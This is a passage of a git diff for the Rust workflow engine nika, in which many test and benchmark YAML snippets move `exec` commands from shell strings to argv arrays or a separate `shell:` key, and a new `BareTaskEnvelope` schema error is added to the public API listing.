+        const SHALLOW: &str = "nika: v1\nworkflow: t\nvars:\n  urls: [\"a\", \"b\"]\ntasks:\n  - id: fan\n    for_each: ${{ vars.urls }}\n    exec: { command: [\"echo\", \"${{ item }}\"] }\n";
+        const DEEP: &str = "nika: v1\nworkflow: t\nvars:\n  rows: [{ url: \"a\" }]\ntasks:\n  - id: fan\n    for_each: ${{ vars.rows }}\n    exec: { command: [\"echo\", \"${{ item.url }}\"] }\n";
         let records = BTreeMap::new();
         let ab = BTreeMap::from([("urls".to_owned(), json!(["a", "b"]))]);
         let ac = BTreeMap::from([("urls".to_owned(), json!(["a", "c"]))]);
@@ -1138,7 +1138,7 @@ mod trace_carry_tests {
     #[tokio::test]
     async fn success_task_completed_carries_the_resume_fields() {
         const WORKFLOW: &str =
-            "nika: v1\nworkflow: carry\ntasks:\n  - id: say\n    exec: { command: \"echo hi\" }\n";
+            "nika: v1\nworkflow: carry\ntasks:\n  - id: say\n    exec: { command: [\"echo\", \"hi\"] }\n";
         let wf = nika_schema::parse(
             WORKFLOW,
             nika_schema::FileId::new(0),
@@ -1201,7 +1201,7 @@ mod trace_carry_tests {
         assert_eq!(stamp.input_hash, input);
     }
 
-    const TWO_TASKS: &str = "nika: v1\nworkflow: resume\ntasks:\n  - id: a\n    exec: { command: \"echo one\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo two ${{ tasks.a.output }}\" }\n";
+    const TWO_TASKS: &str = "nika: v1\nworkflow: resume\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"one\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"two\", \"${{ tasks.a.output }}\"] }\n";
 
     /// Run [`TWO_TASKS`] over mock seams with an optional resume plan —
     /// returns the outcome + the emitted stream.

--- a/crates/nika-runtime/src/tests.rs
+++ b/crates/nika-runtime/src/tests.rs
@@ -82,7 +82,7 @@ async fn wave_settles_stream_before_the_join() {
     use nika_providers::{ProviderRegistry, ProvidersConfig};
     use std::sync::atomic::AtomicBool;
 
-    let yaml = "nika: v1\nworkflow: stream-settle\ntasks:\n  - id: fast\n    exec: { command: \"true\" }\n  - id: gate\n    invoke: { tool: \"nika:jq\", args: { input: [], expression: \".gate\" } }\n";
+    let yaml = "nika: v1\nworkflow: stream-settle\ntasks:\n  - id: fast\n    exec: { command: [\"true\"] }\n  - id: gate\n    invoke: { tool: \"nika:jq\", args: { input: [], expression: \".gate\" } }\n";
     let wf = nika_schema::parse(
         yaml,
         nika_schema::FileId::new(0),
@@ -164,7 +164,7 @@ vars:
   topic: { type: string, default: "news" }
 tasks:
   - id: t
-    exec: { command: "true" }
+    exec: { command: ["true"] }
 "#;
     let wf = nika_schema::parse(
         yaml,
@@ -520,16 +520,16 @@ nika: v1
 workflow: recover-await-same-wave
 tasks:
   - id: risky
-    exec: { command: "exit 1" }
+    exec: { shell: "exit 1" }
     on_error:
       recover: ${{ tasks.source.output }}
     output:
       v: "."
   - id: source
-    exec: { command: "echo 99" }
+    exec: { command: ["echo", "99"] }
   - id: sink
     depends_on: [risky]
-    exec: { command: "use ${{ tasks.risky.output }}" }
+    exec: { command: ["use", "${{ tasks.risky.output }}"] }
 "#;
         let mut streams: Vec<Vec<Event>> = Vec::new();
         for cap in [Some(1), Some(2), None] {
@@ -581,18 +581,18 @@ nika: v1
 workflow: recover-await-chain
 tasks:
   - id: a
-    exec: { command: "exit 1" }
+    exec: { shell: "exit 1" }
     on_error:
       recover: ${{ tasks.b.output }}
   - id: b
-    exec: { command: "exit 2" }
+    exec: { shell: "exit 2" }
     on_error:
       recover: ${{ tasks.c.output }}
   - id: base
-    exec: { command: "echo base" }
+    exec: { command: ["echo", "base"] }
   - id: c
     depends_on: [base]
-    exec: { command: "echo 42" }
+    exec: { command: ["echo", "42"] }
 "#;
         let shell = MockShell::new()
             .enqueue_fail(1, "a boom")
@@ -626,15 +626,15 @@ nika: v1
 workflow: recover-await-skipped
 tasks:
   - id: risky
-    exec: { command: "exit 1" }
+    exec: { shell: "exit 1" }
     on_error:
       recover: ${{ tasks.source.output }}
   - id: base
-    exec: { command: "echo base" }
+    exec: { command: ["echo", "base"] }
   - id: source
     depends_on: [base]
     when: false
-    exec: { command: "echo never" }
+    exec: { command: ["echo", "never"] }
 "#;
         let shell = MockShell::new()
             .enqueue_fail(1, "boom")
@@ -662,11 +662,11 @@ nika: v1
 workflow: recover-await-mutual
 tasks:
   - id: a
-    exec: { command: "exit 1" }
+    exec: { shell: "exit 1" }
     on_error:
       recover: ${{ tasks.b.status }}
   - id: b
-    exec: { command: "exit 2" }
+    exec: { shell: "exit 2" }
     on_error:
       recover: ${{ tasks.a.status }}
 "#;
@@ -702,10 +702,10 @@ nika: v1
 workflow: recover-terminal-broken-path
 tasks:
   - id: done
-    exec: { command: "echo ok" }
+    exec: { command: ["echo", "ok"] }
   - id: risky
     depends_on: [done]
-    exec: { command: "exit 1" }
+    exec: { shell: "exit 1" }
     on_error:
       recover: ${{ tasks.done.output.missing }}
 "#;
@@ -737,7 +737,7 @@ tasks:
     #[test]
     fn undeclared_awaited_root_fails_fast_at_the_park_site() {
         let yaml =
-            "nika: v1\nworkflow: t\ntasks:\n  - id: risky\n    exec: { command: \"exit 1\" }\n";
+            "nika: v1\nworkflow: t\ntasks:\n  - id: risky\n    exec: { shell: \"exit 1\" }\n";
         let wf = nika_schema::parse(
             yaml,
             nika_schema::FileId::new(0),
@@ -831,11 +831,11 @@ workflow: recover-fanout-boundary
 tasks:
   - id: fan
     for_each: ["x"]
-    exec: { command: "exit 1" }
+    exec: { shell: "exit 1" }
     on_error:
       recover: ${{ tasks.source.output }}
   - id: source
-    exec: { command: "echo 9" }
+    exec: { command: ["echo", "9"] }
 "#;
         let shell = MockShell::new().enqueue_fail(1, "boom").enqueue_ok("9\n");
         let (outcome, _events) = run_yaml(yaml, shell, Some(1)).await;

--- a/crates/nika-runtime/tests/agent_telemetry.rs
+++ b/crates/nika-runtime/tests/agent_telemetry.rs
@@ -545,7 +545,7 @@ tasks:
     let report = check(&wf);
 
     let draft =
-        "nika: v1\nworkflow: drafted\ntasks:\n  - id: t\n    exec:\n      command: \"echo hi\"\n";
+        "nika: v1\nworkflow: drafted\ntasks:\n  - id: t\n    exec:\n      command: [\"echo\", \"hi\"]\n";
     let provider = MockProvider::new("mock")
         .enqueue_response(tool_use_response(
             "d1",

--- a/crates/nika-runtime/tests/floor.rs
+++ b/crates/nika-runtime/tests/floor.rs
@@ -354,10 +354,10 @@ workflow: cycle
 tasks:
   - id: a
     depends_on: [b]
-    exec: { command: 'true' }
+    exec: { command: ['true'] }
   - id: b
     depends_on: [a]
-    exec: { command: 'true' }
+    exec: { command: ['true'] }
 ";
     let wf = parse(dirty, FileId::new(0), ParseMode::Strict).expect("parses");
     let report = check(&wf);
@@ -434,10 +434,10 @@ workflow: gates
 tasks:
   - id: always
     when: true
-    exec: { command: 'echo a' }
+    exec: { command: ['echo', 'a'] }
   - id: never
     when: false
-    exec: { command: 'echo b' }
+    exec: { command: ['echo', 'b'] }
 ";
     let (wf, report) = parse_and_check(yaml);
     assert!(report.is_clean());
@@ -485,7 +485,7 @@ vars:
     default: 'bonjour'
 tasks:
   - id: say
-    exec: { command: 'echo ${{ vars.greeting }}' }
+    exec: { shell: 'echo ${{ vars.greeting }}' }
 outputs:
   said:
     value: ${{ tasks.say.output }}
@@ -596,7 +596,7 @@ model: mock/echo
 tasks:
   - id: maybe
     when: false
-    exec: { command: 'echo never' }
+    exec: { command: ['echo', 'never'] }
   - id: think
     depends_on: [maybe]
     infer:
@@ -640,11 +640,11 @@ async fn stress_deep_chain_threads_bindings_in_order() {
     const DEPTH: usize = 24;
     use std::fmt::Write as _;
     let mut yaml = String::from("nika: v1\nworkflow: deep-chain\ntasks:\n");
-    yaml.push_str("  - id: t0\n    exec: { command: 'step 0' }\n");
+    yaml.push_str("  - id: t0\n    exec: { command: ['step', '0'] }\n");
     for n in 1..DEPTH {
         let _ = writeln!(
             yaml,
-            "  - id: t{n}\n    depends_on: [t{prev}]\n    exec: {{ command: 'step {n} after ${{{{ tasks.t{prev}.output }}}}' }}",
+            "  - id: t{n}\n    depends_on: [t{prev}]\n    exec: {{ shell: 'step {n} after ${{{{ tasks.t{prev}.output }}}}' }}",
             prev = n - 1
         );
     }
@@ -692,7 +692,7 @@ async fn stress_wide_fan_in_joins_every_source() {
     use std::fmt::Write as _;
     let mut yaml = String::from("nika: v1\nworkflow: wide-fan\ntasks:\n");
     for n in 0..WIDTH {
-        let _ = writeln!(yaml, "  - id: src{n}\n    exec: {{ command: 'src {n}' }}");
+        let _ = writeln!(yaml, "  - id: src{n}\n    exec: {{ command: ['src', '{n}'] }}");
     }
     let deps: Vec<String> = (0..WIDTH).map(|n| format!("src{n}")).collect();
     let parts: Vec<String> = (0..WIDTH)

--- a/crates/nika-runtime/tests/floor.rs
+++ b/crates/nika-runtime/tests/floor.rs
@@ -49,7 +49,7 @@ tasks:
 
   - id: probe
     exec:
-      command: "wc -l ./news.json"
+      command: ["wc", "-l", "./news.json"]
 
   - id: extract
     depends_on: [gather]
@@ -80,7 +80,7 @@ tasks:
     depends_on: [write_out]
     when: ${{ vars.publish == 'yes' }}
     exec:
-      command: "echo done"
+      command: ["echo", "done"]
 
 outputs:
   report: ${{ tasks.write_out.output }}

--- a/crates/nika-runtime/tests/output_fidelity.rs
+++ b/crates/nika-runtime/tests/output_fidelity.rs
@@ -100,7 +100,7 @@ tasks:
   - id: gate
     depends_on: [src]
     when: ${{ tasks.src.c == 7 }}
-    exec: { command: "echo gated" }
+    exec: { command: ["echo", "gated"] }
 "#;
     let tools = MockToolExecutor::new().enqueue_ok(
         ToolResult::success("c-jq", r#"{"count":7}"#)
@@ -147,7 +147,7 @@ tasks:
   - id: use
     depends_on: [api]
     when: ${{ tasks.api.n == 2 }}
-    exec: { command: "echo two" }
+    exec: { command: ["echo", "two"] }
 "#;
     let body =
         serde_json::json!({ "data": { "users": [ { "email": "a@x" }, { "email": "b@y" } ] } });
@@ -245,7 +245,7 @@ tasks:
   - id: join
     depends_on: [maybe]
     when: ${{ tasks.maybe.c == null }}
-    exec: { command: "echo joined" }
+    exec: { command: ["echo", "joined"] }
 "#;
     let (outcome, _events) = run_to_events(
         yaml,
@@ -282,11 +282,11 @@ nika: v1
 workflow: exec-structured
 tasks:
   - id: probe
-    exec: { command: "run-it", capture: structured }
+    exec: { command: ["run-it"], capture: structured }
   - id: gate
     depends_on: [probe]
     when: ${{ tasks.probe.output.exit_code == 3 }}
-    exec: { command: "echo branched" }
+    exec: { command: ["echo", "branched"] }
 "#;
     // A non-zero exit with BOTH streams — structured carries it as data.
     let shell = MockShell::new()
@@ -335,11 +335,11 @@ nika: v1
 workflow: exec-plain
 tasks:
   - id: e
-    exec: { command: "printf 42" }
+    exec: { command: ["printf", "42"] }
   - id: gate
     depends_on: [e]
     when: ${{ tasks.e.output == '42' }}
-    exec: { command: "echo ok" }
+    exec: { command: ["echo", "ok"] }
 "#;
     let shell = MockShell::new().enqueue_ok("42\n").enqueue_ok("ok\n");
     let (outcome, _events) = run_to_events(

--- a/crates/nika-runtime/tests/secret_resolution.rs
+++ b/crates/nika-runtime/tests/secret_resolution.rs
@@ -116,10 +116,15 @@ tasks:
     assert_eq!(outcome.records["use_it"].status, TaskStatus::Success);
     let commands = shell.executed_commands();
     assert_eq!(commands.len(), 1, "the exec ran once");
+    // argv form (0.103): the secret rides its own argument, never the
+    // program — assert over the whole argv line.
+    let argv_line = std::iter::once(commands[0].program.as_str())
+        .chain(commands[0].args.iter().map(String::as_str))
+        .collect::<Vec<_>>()
+        .join(" ");
     assert!(
-        commands[0].program.contains("sk-SECRET-VALUE"),
-        "the resolved secret reached the sanctioned exec sink: {}",
-        commands[0].program
+        argv_line.contains("sk-SECRET-VALUE"),
+        "the resolved secret reached the sanctioned exec sink: {argv_line}"
     );
 
     // 2 · the secret value NEVER appears in the event stream (every field of

--- a/crates/nika-runtime/tests/secret_resolution.rs
+++ b/crates/nika-runtime/tests/secret_resolution.rs
@@ -102,7 +102,7 @@ secrets:
       - to: "exec"
 tasks:
   - id: use_it
-    exec: { command: "deploy --auth ${{ secrets.token }}" }
+    exec: { command: ["deploy", "--auth", "${{ secrets.token }}"] }
 "#;
     let shell = MockShell::new().enqueue_ok("deployed\n");
     let resolver = Arc::new(MapSecrets(BTreeMap::from([(
@@ -154,7 +154,7 @@ secrets:
       - to: "exec"
 tasks:
   - id: use_it
-    exec: { command: "deploy --auth ${{ secrets.token }}" }
+    exec: { command: ["deploy", "--auth", "${{ secrets.token }}"] }
 "#;
     // The resolver returns nothing (the env var is absent) → the secret is
     // unbound → the reference is the loud unresolved class. Its WIRE code is
@@ -193,7 +193,7 @@ secrets:
       - to: "exec"
 tasks:
   - id: use_it
-    exec: { command: "deploy --auth ${{ secrets.token }}" }
+    exec: { command: ["deploy", "--auth", "${{ secrets.token }}"] }
 "#;
     let wf = parse(yaml, FileId::new(0), ParseMode::Strict).expect("parses");
     let report = check(&wf);

--- a/crates/nika-runtime/tests/spec_v2.rs
+++ b/crates/nika-runtime/tests/spec_v2.rs
@@ -128,18 +128,18 @@ workflow: cap-eq
 vars: { publish: "no" }
 tasks:
   - id: a
-    exec: { command: "step a" }
+    exec: { command: ["step", "a"] }
   - id: b
-    exec: { command: "step b" }
+    exec: { command: ["step", "b"] }
   - id: c
-    exec: { command: "step c" }
+    exec: { command: ["step", "c"] }
   - id: join
     depends_on: [a, b, c]
-    exec: { command: "join ${{ tasks.a.output }} ${{ tasks.b.output }} ${{ tasks.c.output }}" }
+    exec: { command: ["join", "${{ tasks.a.output }}", "${{ tasks.b.output }}", "${{ tasks.c.output }}"] }
   - id: gated
     depends_on: [join]
     when: ${{ vars.publish == 'yes' }}
-    exec: { command: "echo never" }
+    exec: { command: ["echo", "never"] }
 "#;
     let mut streams: Vec<Vec<Event>> = Vec::new();
     for cap in [Some(1), Some(2), Some(8), None] {
@@ -254,9 +254,9 @@ nika: v1
 workflow: drain
 tasks:
   - id: dies
-    exec: { command: "boom" }
+    exec: { command: ["boom"] }
   - id: survives
-    exec: { command: "fine" }
+    exec: { command: ["fine"] }
 "#;
     let shell = MockShell::new()
         .enqueue_fail(9, "kaboom")
@@ -287,14 +287,14 @@ nika: v1
 workflow: always
 tasks:
   - id: build
-    exec: { command: "make" }
+    exec: { command: ["make"] }
   - id: deploy
     depends_on: [build]
-    exec: { command: "deploy" }
+    exec: { command: ["deploy"] }
   - id: notify
     depends_on: [build]
     when: true
-    exec: { command: "notify team" }
+    exec: { command: ["notify", "team"] }
 "#;
     let shell = MockShell::new()
         .enqueue_fail(1, "compile error")
@@ -569,7 +569,7 @@ nika: v1
 workflow: recovery
 tasks:
   - id: cached
-    exec: { command: "cat cache.json" }
+    exec: { command: ["cat", "cache.json"] }
   - id: live
     depends_on: [cached]
     on_error: { recover: "${{ tasks.cached.output }}" }
@@ -582,7 +582,7 @@ tasks:
     invoke: { tool: "nika:fetch", args: { url: "https://example.com/c" } }
   - id: downstream
     depends_on: [live]
-    exec: { command: "use ${{ tasks.live.output }}" }
+    exec: { command: ["use", "${{ tasks.live.output }}"] }
 "#;
     let shell = MockShell::new()
         .enqueue_ok("stale data\n")
@@ -635,7 +635,7 @@ nika: v1
 workflow: oncodes-catch
 tasks:
   - id: boom
-    exec: { command: "exit 7" }
+    exec: { shell: "exit 7" }
     on_error:
       on_codes: [NIKA-EXEC-001]
       recover: "recovered"
@@ -660,7 +660,7 @@ nika: v1
 workflow: oncodes-skip
 tasks:
   - id: boom
-    exec: { command: "exit 7" }
+    exec: { shell: "exit 7" }
     on_error: { skip: true }
 "#;
     let (outcome, _events) = run_to_events(
@@ -690,7 +690,7 @@ workflow: oncodes-retry
 tasks:
   - id: boom
     retry: { max_attempts: 2, backoff_ms: 1, backoff_strategy: fixed, jitter: false, on_codes: [NIKA-EXEC-001] }
-    exec: { command: "exit 7" }
+    exec: { shell: "exit 7" }
 "#;
     let shell = MockShell::new()
         .enqueue_fail(7, "boom")
@@ -719,7 +719,7 @@ nika: v1
 workflow: oncodes-miss
 tasks:
   - id: boom
-    exec: { command: "exit 7" }
+    exec: { shell: "exit 7" }
     on_error:
       on_codes: [NIKA-INFER-001]
       recover: "should-not-fire"
@@ -753,10 +753,10 @@ tasks:
     for_each: ${{ vars.urls }}
     max_parallel: 1
     with: { page: "${{ item }}" }
-    exec: { command: "fetch ${{ with.page }} at ${{ index }}" }
+    exec: { command: ["fetch", "${{ with.page }}", "at", "${{ index }}"] }
   - id: join
     depends_on: [scrape]
-    exec: { command: "got ${{ tasks.scrape.output }}" }
+    exec: { command: ["got", "${{ tasks.scrape.output }}"] }
 "#;
     let shell = MockShell::new()
         .enqueue_ok("r-alpha\n")
@@ -850,7 +850,7 @@ tasks:
     for_each: ${{ vars.items }}
     max_parallel: 1
     fail_fast: false
-    exec: { command: "do ${{ item }}" }
+    exec: { command: ["do", "${{ item }}"] }
 "#;
     let shell = MockShell::new()
         .enqueue_ok("ok-one\n")
@@ -893,7 +893,7 @@ tasks:
     for_each: ${{ vars.items }}
     max_parallel: 1
     on_error: { skip: true }
-    exec: { command: "do ${{ item }}" }
+    exec: { command: ["do", "${{ item }}"] }
 "#;
     let shell = MockShell::new()
         .enqueue_ok("ok-one\n")
@@ -933,7 +933,7 @@ tasks:
   - id: work
     for_each: ${{ vars.items }}
     max_parallel: 1
-    exec: { command: "do ${{ item }}" }
+    exec: { command: ["do", "${{ item }}"] }
 "#;
     // Only TWO shell results enqueued: iteration 1 ok · iteration 2
     // fails · iteration 3 must never dispatch (an empty queue would
@@ -966,10 +966,10 @@ vars:
 tasks:
   - id: empty_lane
     for_each: ${{ vars.none }}
-    exec: { command: "never ${{ item }}" }
+    exec: { command: ["never", "${{ item }}"] }
   - id: bad_lane
     for_each: ${{ vars.scalar }}
-    exec: { command: "never ${{ item }}" }
+    exec: { command: ["never", "${{ item }}"] }
 "#;
     let (outcome, events) = run_to_events(
         yaml,
@@ -1046,20 +1046,20 @@ nika: v1
 workflow: cleanup
 tasks:
   - id: works
-    exec: { command: "make thing" }
+    exec: { command: ["make", "thing"] }
     on_finally:
-      - exec: { command: "rm -f scratch-a" }
+      - exec: { command: ["rm", "-f", "scratch-a"] }
   - id: breaks
-    exec: { command: "make other" }
+    exec: { command: ["make", "other"] }
     on_finally:
       - when: ${{ tasks.breaks.status == 'failure' }}
-        exec: { command: "alert on-call" }
-      - exec: { command: "rm -f scratch-b" }
+        exec: { command: ["alert", "on-call"] }
+      - exec: { command: ["rm", "-f", "scratch-b"] }
   - id: never_ran
     depends_on: [breaks]
-    exec: { command: "downstream" }
+    exec: { command: ["downstream"] }
     on_finally:
-      - exec: { command: "must not run" }
+      - exec: { command: ["must", "not", "run"] }
 "#;
     // Queue: works · works-cleanup · breaks(FAIL) · breaks-cleanup-1
     // (alert · gate OPEN on failure) · breaks-cleanup-2 — and NOTHING
@@ -1097,9 +1097,9 @@ nika: v1
 workflow: cleanup-err
 tasks:
   - id: main
-    exec: { command: "work" }
+    exec: { command: ["work"] }
     on_finally:
-      - exec: { command: "broken cleanup" }
+      - exec: { command: ["broken", "cleanup"] }
 "#;
     let shell = MockShell::new()
         .enqueue_ok("worked\n")
@@ -1134,11 +1134,11 @@ vars: { mode: "fast" }
 tasks:
   - id: slow_path
     when: ${{ vars.mode == 'slow' }}
-    exec: { command: "slow work" }
+    exec: { command: ["slow", "work"] }
   - id: report
     depends_on: [slow_path]
     when: ${{ tasks.slow_path.status != 'success' }}
-    exec: { command: "report skipped lane" }
+    exec: { command: ["report", "skipped", "lane"] }
 "#;
     let shell = MockShell::new().enqueue_ok("reported\n");
     let (outcome, _events) = run_to_events(
@@ -1203,7 +1203,7 @@ vars: { scalar: "not a list" }
 tasks:
   - id: bad
     for_each: ${{ vars.scalar }}
-    exec: { command: "never ${{ item }}" }
+    exec: { command: ["never", "${{ item }}"] }
 "#;
     let (outcome2, _) = run_to_events(
         var_yaml,
@@ -1253,7 +1253,7 @@ tasks:
   - id: fan
     for_each: ${{ vars.items }}
     when: ${{ item != 'skip' }}
-    exec: { command: "do ${{ item }}" }
+    exec: { command: ["do", "${{ item }}"] }
 "#;
     let (outcome, events) = run_to_events(
         yaml,
@@ -1365,7 +1365,7 @@ tasks:
   - id: use
     depends_on: [api]
     when: ${{ tasks.api.output.count > 1 }}
-    exec: { command: "echo ${{ tasks.api.output.count }}" }
+    exec: { command: ["echo", "${{ tasks.api.output.count }}"] }
 "#;
     let tools = MockToolExecutor::new().enqueue_ok(
         ToolResult::success("c-jq", r#"{"count":2}"#)

--- a/crates/nika-runtime/tests/var_overrides.rs
+++ b/crates/nika-runtime/tests/var_overrides.rs
@@ -33,7 +33,7 @@ vars:
   lang: { type: string, default: "en" }
 tasks:
   - id: say
-    exec: { command: "echo ${{ vars.topic }}" }
+    exec: { command: ["echo", "${{ vars.topic }}"] }
 outputs:
   topic_out: ${{ vars.topic }}
   lang_out: ${{ vars.lang }}

--- a/crates/nika-schema/benches/parse_bench.rs
+++ b/crates/nika-schema/benches/parse_bench.rs
@@ -46,7 +46,7 @@ tasks:
   - id: report
     depends_on: [extract]
     exec:
-      command: "report ${{ tasks.extract.output.entities }} (${{ tasks.extract.output.count }})"
+      shell: "report ${{ tasks.extract.output.entities }} (${{ tasks.extract.output.count }})"
 "#;
 
 /// One `infer` producer + `n` fan-out `exec` consumers, each binding a declared
@@ -64,7 +64,7 @@ fn large_workflow(n: usize) -> String {
         s.push_str(&i.to_string());
         s.push_str(
             "\n    depends_on: [extract]\n    exec:\n      \
-             command: \"report ${{ tasks.extract.output.entities }}\"\n",
+             command: [\"report\", \"${{ tasks.extract.output.entities }}\"]\n",
         );
     }
     s

--- a/crates/nika-schema/examples/check/render.rs
+++ b/crates/nika-schema/examples/check/render.rs
@@ -595,7 +595,7 @@ mod tests {
 
     /// A chrome-only workflow (no findings · no hints): every rendered
     /// byte is OURS, so the snapshots pin the frame, not library text.
-    const CHROME_ONLY: &str = "nika: v1\nworkflow: pipeline\npermits: { exec: [\"true\"] }\ntasks:\n  - id: first\n    exec: { command: \"true\" }\n  - id: second\n    depends_on: [first]\n    exec: { command: \"true\" }\n";
+    const CHROME_ONLY: &str = "nika: v1\nworkflow: pipeline\npermits: { exec: [\"true\"] }\ntasks:\n  - id: first\n    exec: { command: [\"true\"] }\n  - id: second\n    depends_on: [first]\n    exec: { command: [\"true\"] }\n";
 
     fn rendered(t: Theme) -> String {
         let wf = parse(CHROME_ONLY, FileId::new(0), ParseMode::Strict).expect("parse");
@@ -657,7 +657,7 @@ mod tests {
         // p→a1→x2 · p→x1 · isolated x0: Kahn waves peak at 2, the exact
         // antichain width is 3 — BOTH renderers must say so (this is
         // the example renderer's half; verbs/check.rs has the CLI's).
-        let yaml = "nika: v1\nworkflow: wide\npermits: { exec: [\"true\"] }\ntasks:\n  - id: p\n    exec: { command: \"true\" }\n  - id: x0\n    exec: { command: \"true\" }\n  - id: a1\n    depends_on: [p]\n    exec: { command: \"true\" }\n  - id: x1\n    depends_on: [p]\n    exec: { command: \"true\" }\n  - id: x2\n    depends_on: [a1]\n    exec: { command: \"true\" }\n";
+        let yaml = "nika: v1\nworkflow: wide\npermits: { exec: [\"true\"] }\ntasks:\n  - id: p\n    exec: { command: [\"true\"] }\n  - id: x0\n    exec: { command: [\"true\"] }\n  - id: a1\n    depends_on: [p]\n    exec: { command: [\"true\"] }\n  - id: x1\n    depends_on: [p]\n    exec: { command: [\"true\"] }\n  - id: x2\n    depends_on: [a1]\n    exec: { command: [\"true\"] }\n";
         let wf = parse(yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let report = check(&wf);
         let analysis = report.analysis.as_ref().expect("conformant -> analysis");

--- a/crates/nika-schema/public-api.txt
+++ b/crates/nika-schema/public-api.txt
@@ -1695,6 +1695,10 @@ pub nika_schema::error::SchemaError::BadTypedVar::span: core::option::Option<nik
 pub nika_schema::error::SchemaError::BadWorkflowId
 pub nika_schema::error::SchemaError::BadWorkflowId::id: alloc::string::String
 pub nika_schema::error::SchemaError::BadWorkflowId::span: core::option::Option<nika_schema::Span>
+pub nika_schema::error::SchemaError::BareTaskEnvelope
+pub nika_schema::error::SchemaError::BareTaskEnvelope::location: alloc::string::String
+pub nika_schema::error::SchemaError::BareTaskEnvelope::span: core::option::Option<nika_schema::Span>
+pub nika_schema::error::SchemaError::BareTaskEnvelope::task: alloc::string::String
 pub nika_schema::error::SchemaError::Cycle
 pub nika_schema::error::SchemaError::Cycle::cycle: alloc::vec::Vec<alloc::string::String>
 pub nika_schema::error::SchemaError::DuplicateKey
@@ -5912,6 +5916,10 @@ pub nika_schema::SchemaError::BadTypedVar::span: core::option::Option<nika_schem
 pub nika_schema::SchemaError::BadWorkflowId
 pub nika_schema::SchemaError::BadWorkflowId::id: alloc::string::String
 pub nika_schema::SchemaError::BadWorkflowId::span: core::option::Option<nika_schema::Span>
+pub nika_schema::SchemaError::BareTaskEnvelope
+pub nika_schema::SchemaError::BareTaskEnvelope::location: alloc::string::String
+pub nika_schema::SchemaError::BareTaskEnvelope::span: core::option::Option<nika_schema::Span>
+pub nika_schema::SchemaError::BareTaskEnvelope::task: alloc::string::String
 pub nika_schema::SchemaError::Cycle
 pub nika_schema::SchemaError::Cycle::cycle: alloc::vec::Vec<alloc::string::String>
 pub nika_schema::SchemaError::DuplicateKey

--- a/crates/nika-schema/src/analyzer/builtin_shape.rs
+++ b/crates/nika-schema/src/analyzer/builtin_shape.rs
@@ -499,7 +499,7 @@ mod tests {
         // the XOR violation (a flat-required miss like `nika:write` content
         // is now the missing-args check's concern · tested there).
         let finally = "nika: v1\nworkflow: t\ntasks:\n  - id: w\n    \
-                       exec: { command: echo }\n    on_finally:\n      - invoke:\n          \
+                       exec: { command: [echo] }\n    on_finally:\n      - invoke:\n          \
                        tool: \"nika:wait\"\n          args: {}\n";
         assert!(has_shape_error(finally, "nika:wait"));
     }

--- a/crates/nika-schema/src/analyzer/dag.rs
+++ b/crates/nika-schema/src/analyzer/dag.rs
@@ -263,10 +263,10 @@ mod tests {
         body: \"${{{{ tasks.report.output }}}}\"
   - id: mid
     depends_on: [fetch]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: report
     depends_on: [mid]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let errors = analyze_yaml(&yaml).expect_err("deadlock");
@@ -298,10 +298,10 @@ mod tests {
         - \"${{{{ tasks.report.output }}}}\"
   - id: mid
     depends_on: [fetch]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: report
     depends_on: [mid]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let errors = analyze_yaml(&yaml).expect_err("deadlock via array-nested ref");
@@ -328,10 +328,10 @@ mod tests {
         let yaml = format!(
             "{HEADER}tasks:
   - id: base
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: other
     depends_on: [base]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: fetch
     invoke: {{ tool: \"nika:fetch\", args: {{ url: \"https://x.example\" }} }}
     on_error:
@@ -366,10 +366,10 @@ mod tests {
             "{HEADER}tasks:
   - id: a
     depends_on: [b]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: b
     depends_on: [a]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let errors = analyze_yaml(&yaml).expect_err("cycle");
@@ -396,10 +396,10 @@ mod tests {
             "{HEADER}tasks:
   - id: a
     depends_on: [b]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: b
     depends_on: [a]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let errors = analyze_yaml(&yaml).expect_err("cycle");
@@ -425,7 +425,7 @@ mod tests {
             "{HEADER}tasks:
   - id: a
     depends_on: [a]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let errors = analyze_yaml(&yaml).expect_err("self-cycle");
@@ -444,7 +444,7 @@ mod tests {
             "{HEADER}tasks:
   - id: a
     depends_on: [ghost]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let errors = analyze_yaml(&yaml).expect_err("unresolved");
@@ -462,16 +462,16 @@ mod tests {
         let yaml = format!(
             "{HEADER}tasks:
   - id: a
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: b
     depends_on: [a]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: c
     depends_on: [a]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: d
     depends_on: [b, c]
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let analyzed = analyze_yaml(&yaml).expect("valid diamond");
@@ -486,9 +486,9 @@ mod tests {
         let yaml = format!(
             "{HEADER}tasks:
   - id: x
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
   - id: y
-    exec: {{ command: echo }}
+    exec: {{ command: [echo] }}
 "
         );
         let analyzed = analyze_yaml(&yaml).expect("valid");

--- a/crates/nika-schema/src/analyzer/mod.rs
+++ b/crates/nika-schema/src/analyzer/mod.rs
@@ -198,9 +198,9 @@ nika: v1
 workflow: dup
 tasks:
   - id: same
-    exec: { command: echo }
+    exec: { command: [echo] }
   - id: same
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let errors = analyze_yaml(yaml).expect_err("dup id");
         assert_has(
@@ -220,10 +220,10 @@ nika: v1
 workflow: t
 tasks:
   - id: test
-    exec: { command: \"./test.sh\" }
+    exec: { command: [\"./test.sh\"] }
   - id: deploy
